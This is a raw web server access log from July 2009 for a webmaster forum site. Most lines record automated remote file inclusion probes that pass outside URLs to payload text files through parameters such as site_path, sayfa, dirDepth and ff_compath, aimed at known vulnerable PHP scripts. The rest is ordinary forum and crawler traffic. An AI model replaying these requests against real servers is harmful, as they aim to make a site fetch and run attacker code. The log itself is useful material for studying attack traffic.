83.98.209.71 - - [04/Jul/2009:18:22:20 -0700] "GET /logs/showfile.php/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:22:20 -0700] "GET /logs/showfile.php/access_090523.log/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
81.88.49.10 - - [04/Jul/2009:18:22:27 -0700] "GET /EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 404 573 "-" "libwww-perl/5.800" "www.webmaster-showcase.net"
81.88.49.10 - - [04/Jul/2009:18:22:27 -0700] "GET /logs/showfile.php//EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 200 1595 "-" "libwww-perl/5.800" "www.webmaster-showcase.net"
81.88.49.10 - - [04/Jul/2009:18:22:27 -0700] "GET /logs/showfile.php/access.log//EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 200 1595 "-" "libwww-perl/5.800" "www.webmaster-showcase.net"
96.31.68.140 - - [04/Jul/2009:18:22:35 -0700] "POST /phpBB2/posting.php?sid=92e01a5a856f18055d46020aa03c8238 HTTP/1.1" 200 13117 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
81.88.49.10 - - [04/Jul/2009:18:22:43 -0700] "GET /logs/showfile.php/access_090508.log//EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 200 1595 "-" "libwww-perl/5.800" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:22:47 -0700] "GET /include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 593 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:22:47 -0700] "GET /logs/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 585 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:22:47 -0700] "GET /logs/showfile.php/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:22:47 -0700] "GET /logs/showfile.php/access_090523.log/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
65.55.110.43 - - [04/Jul/2009:18:23:09 -0700] "GET /phpBB2/viewtopic.php?p=162762 HTTP/1.0" 200 71563 "http://search.live.com/results.aspx?q=forums" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "webmaster-showcase.net"
83.65.40.130 - - [04/Jul/2009:18:23:16 -0700] "GET /logs/showfile.php/access.log//EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 200 1595 "-" "libwww-perl/5.813" "www.webmaster-showcase.net"
83.65.40.130 - - [04/Jul/2009:18:23:16 -0700] "GET /logs/showfile.php//EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 200 1595 "-" "libwww-perl/5.813" "www.webmaster-showcase.net"
83.65.40.130 - - [04/Jul/2009:18:23:16 -0700] "GET /EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 404 573 "-" "libwww-perl/5.813" "www.webmaster-showcase.net"
83.65.40.130 - - [04/Jul/2009:18:23:30 -0700] "GET /logs/showfile.php/access_090508.log//EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 200 1595 "-" "libwww-perl/5.813" "www.webmaster-showcase.net"
95.169.190.71 - - [04/Jul/2009:18:23:42 -0700] "GET /phpBB2/posting.php?mode=quote&p=6390& HTTP/1.1" 200 116495 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:23:52 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 588 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:23:52 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 593 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:23:52 -0700] "GET /logs/showfile.php/includes/ktedit/toolbar.php?dirDepth=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:23:52 -0700] "GET /logs/showfile.php/access_090523.log/includes/ktedit/toolbar.php?dirDepth=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
65.17.253.220 - - [04/Jul/2009:18:23:52 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:23:56 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 588 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:23:56 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 593 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:23:56 -0700] "GET /logs/showfile.php/access_090523.log/includes/ktedit/toolbar.php?dirDepth=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:23:56 -0700] "GET /logs/showfile.php/includes/ktedit/toolbar.php?dirDepth=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
95.169.190.71 - - [04/Jul/2009:18:23:58 -0700] "POST /phpBB2/posting.php?sid=9cb6901c19afb8cf052066c95ddb9da9 HTTP/1.1" 200 12781 "http://webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:24:10 -0700] "GET /citywriter/head.php?path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 580 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:24:10 -0700] "GET /logs//citywriter/head.php?path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 586 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:24:10 -0700] "GET /logs/showfile.php//citywriter/head.php?path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:24:10 -0700] "GET /logs/showfile.php/access_090615.log//citywriter/head.php?path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
66.71.241.146 - - [04/Jul/2009:18:24:29 -0700] "GET /logs/showfile.php/access_090523.log/includes/ktedit/toolbar.php?dirDepth=http://hbulonline.com/v7id.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.811" "www.webmaster-showcase.net"
66.71.241.146 - - [04/Jul/2009:18:24:30 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://hbulonline.com/v7id.txt??? HTTP/1.1" 404 588 "-" "libwww-perl/5.811" "www.webmaster-showcase.net"
66.71.241.146 - - [04/Jul/2009:18:24:30 -0700] "GET /logs/showfile.php/includes/ktedit/toolbar.php?dirDepth=http://hbulonline.com/v7id.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.811" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:24:36 -0700] "GET /citywriter/head.php?path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 580 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:24:36 -0700] "GET /logs//citywriter/head.php?path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 586 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:24:36 -0700] "GET /logs/showfile.php//citywriter/head.php?path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:24:36 -0700] "GET /logs/showfile.php/access_090615.log%20%20//citywriter/head.php?path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:18:24:39 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 593 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:18:24:39 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 588 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:18:24:40 -0700] "GET /logs/showfile.php/includes/ktedit/toolbar.php?dirDepth=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:18:24:40 -0700] "GET /logs/showfile.php/access_090523.log%20%20/includes/ktedit/toolbar.php?dirDepth=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
209.235.254.107 - - [04/Jul/2009:18:25:01 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
217.112.35.43 - - [04/Jul/2009:18:25:05 -0700] "GET /EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 404 573 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
217.112.35.43 - - [04/Jul/2009:18:25:05 -0700] "GET /logs/showfile.php//EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
217.112.35.43 - - [04/Jul/2009:18:25:05 -0700] "GET /logs/showfile.php/access.log%20//EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:18:25:07 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 588 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:18:25:07 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 593 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:18:25:07 -0700] "GET /logs/showfile.php/includes/ktedit/toolbar.php?dirDepth=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:18:25:07 -0700] "GET /logs/showfile.php/access_090523.log%20%20/includes/ktedit/toolbar.php?dirDepth=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.90.164.110 - - [04/Jul/2009:18:25:17 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
212.95.226.66 - - [04/Jul/2009:18:26:09 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
81.88.49.10 - - [04/Jul/2009:18:26:13 -0700] "GET /logs/showfile.php/access.log%20//EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 200 1595 "-" "libwww-perl/5.800" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:26:27 -0700] "GET /logs/showfile.php/access_090615.log%20%20//citywriter/head.php?path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
217.112.35.43 - - [04/Jul/2009:18:26:28 -0700] "GET /logs/showfile.php/access.log//EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
217.112.35.43 - - [04/Jul/2009:18:26:40 -0700] "GET /logs/showfile.php/access_090508.log//EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
62.149.226.208 - - [04/Jul/2009:18:26:57 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
66.232.97.145 - - [04/Jul/2009:18:27:00 -0700] "POST /phpBB2/posting.php?sid=94cb7a33e52bef2fb463a7f8d26245fb HTTP/1.1" 200 13225 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:27:03 -0700] "GET /logs/showfile.php/access_090615.log//citywriter/head.php?path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:27:42 -0700] "GET /logs/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 585 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:27:42 -0700] "GET /include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 593 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:27:42 -0700] "GET /logs/showfile.php/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:27:42 -0700] "GET /logs/showfile.php/access_090523.log/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
65.60.32.34 - - [04/Jul/2009:18:27:53 -0700] "POST /phpBB2/posting.php?sid=e75b527657eedaeb3177aa2e87baf289 HTTP/1.1" 200 13214 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
72.249.171.6 - - [04/Jul/2009:18:27:59 -0700] "GET /EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 404 573 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
72.249.171.6 - - [04/Jul/2009:18:27:59 -0700] "GET /logs/showfile.php/access.log//EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
72.249.171.6 - - [04/Jul/2009:18:27:59 -0700] "GET /logs/showfile.php//EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:18:28:02 -0700] "GET /logs/showfile.php/access_090523.log%20%20/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:18:28:05 -0700] "GET /logs/showfile.php/access_090523.log%20%20/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
72.249.171.6 - - [04/Jul/2009:18:28:47 -0700] "GET /logs/showfile.php/access_090508.log//EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:31:10 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 588 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:31:10 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 593 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:31:10 -0700] "GET /logs/showfile.php/includes/ktedit/toolbar.php?dirDepth=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:31:10 -0700] "GET /logs/showfile.php/access_090523.log/includes/ktedit/toolbar.php?dirDepth=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
208.109.21.238 - - [04/Jul/2009:18:31:24 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
87.106.179.130 - - [04/Jul/2009:18:32:21 -0700] "GET /EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 404 573 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
87.106.179.130 - - [04/Jul/2009:18:32:21 -0700] "GET /logs/showfile.php//EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
87.106.179.130 - - [04/Jul/2009:18:32:21 -0700] "GET /logs/showfile.php/access.log//EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
72.249.171.6 - - [04/Jul/2009:18:32:48 -0700] "GET /logs/showfile.php/access.log%20//EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
93.174.93.58 - - [04/Jul/2009:18:33:05 -0700] "GET /php/simple-php-guestbook/gbook.txt HTTP/1.1" 200 786432 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "webmaster-showcase.net"
87.106.179.130 - - [04/Jul/2009:18:33:08 -0700] "GET /logs/showfile.php/access_090508.log//EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
69.94.80.27 - - [04/Jul/2009:18:33:55 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 404 609 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
69.94.80.27 - - [04/Jul/2009:18:33:55 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 404 615 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
69.94.80.27 - - [04/Jul/2009:18:33:55 -0700] "GET /logs/showfile.php/access_090523.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
69.94.80.27 - - [04/Jul/2009:18:33:55 -0700] "GET /logs/showfile.php//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
69.94.80.27 - - [04/Jul/2009:18:34:18 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 404 609 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
69.94.80.27 - - [04/Jul/2009:18:34:18 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 404 615 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
69.94.80.27 - - [04/Jul/2009:18:34:18 -0700] "GET /logs/showfile.php//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
69.94.80.27 - - [04/Jul/2009:18:34:18 -0700] "GET /logs/showfile.php/access_090523.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
69.94.80.27 - - [04/Jul/2009:18:34:49 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 404 615 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
69.94.80.27 - - [04/Jul/2009:18:34:49 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 404 609 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
69.94.80.27 - - [04/Jul/2009:18:34:49 -0700] "GET /logs/showfile.php/access_090523.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
69.94.80.27 - - [04/Jul/2009:18:34:49 -0700] "GET /logs/showfile.php//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
69.94.80.27 - - [04/Jul/2009:18:35:08 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 404 609 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
69.94.80.27 - - [04/Jul/2009:18:35:08 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 404 615 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
69.94.80.27 - - [04/Jul/2009:18:35:08 -0700] "GET /logs/showfile.php//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
69.94.80.27 - - [04/Jul/2009:18:35:09 -0700] "GET /logs/showfile.php/access_090523.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
69.94.80.27 - - [04/Jul/2009:18:35:16 -0700] "GET /logs/showfile.php/access.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
69.94.80.27 - - [04/Jul/2009:18:35:24 -0700] "GET /logs/showfile.php/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
69.94.80.27 - - [04/Jul/2009:18:35:27 -0700] "GET /logs/showfile.php/access.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
69.94.80.27 - - [04/Jul/2009:18:35:43 -0700] "GET /logs/showfile.php/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kiralyfa.hu/images/smilies/1? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
96.31.68.140 - - [04/Jul/2009:18:36:01 -0700] "POST /phpBB2/posting.php?sid=92e01a5a856f18055d46020aa03c8238 HTTP/1.1" 200 13134 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
69.20.70.31 - - [04/Jul/2009:18:36:42 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
65.55.210.69 - - [04/Jul/2009:18:37:26 -0700] "GET /php/string2png.php?s=next&c=ff0000 HTTP/1.1" 200 1798 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:37:38 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 604 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:37:38 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 610 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:37:38 -0700] "GET /logs/showfile.php/access_090606.log//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:37:38 -0700] "GET /logs/showfile.php//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:37:40 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 604 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:37:40 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 610 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:37:40 -0700] "GET /logs/showfile.php//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:37:40 -0700] "GET /logs/showfile.php/access_090606.log//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
69.46.23.47 - - [04/Jul/2009:18:38:00 -0700] "POST /phpBB2/posting.php?sid=e71b27cb0ee5c22bc6672b27e0b3c669 HTTP/1.1" 200 13200 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
65.55.110.123 - - [04/Jul/2009:18:38:03 -0700] "GET /php/string2png.php?s=next&c=ff0000 HTTP/1.0" 200 1782 "http://search.live.com/results.aspx?q=create" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.webmaster-showcase.net"
